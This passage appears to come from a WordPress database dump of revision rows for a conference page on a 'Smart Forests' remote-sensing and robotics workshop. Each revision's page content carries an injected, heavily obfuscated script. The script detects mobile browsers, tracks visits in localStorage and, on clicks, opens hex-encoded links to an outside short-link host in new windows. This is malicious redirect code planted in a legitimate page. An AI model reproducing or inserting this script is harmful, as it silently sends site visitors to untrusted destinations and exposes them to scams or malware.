wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:45:23','2022-11-08 19:45:23','',3049,'https://gsw2023.com/?p=3055',0,'revision','',0),
(3056,1,'2022-11-08 19:48:15','2022-11-08 19:48:15','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2>CO-CHAIRS</h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:48:15','2022-11-08 19:48:15','',3049,'https://gsw2023.com/?p=3056',0,'revision','',0),
(3057,1,'2022-11-08 19:49:16','2022-11-08 19:49:16','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2></h2>\n<h2>CO-CHAIRS</h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 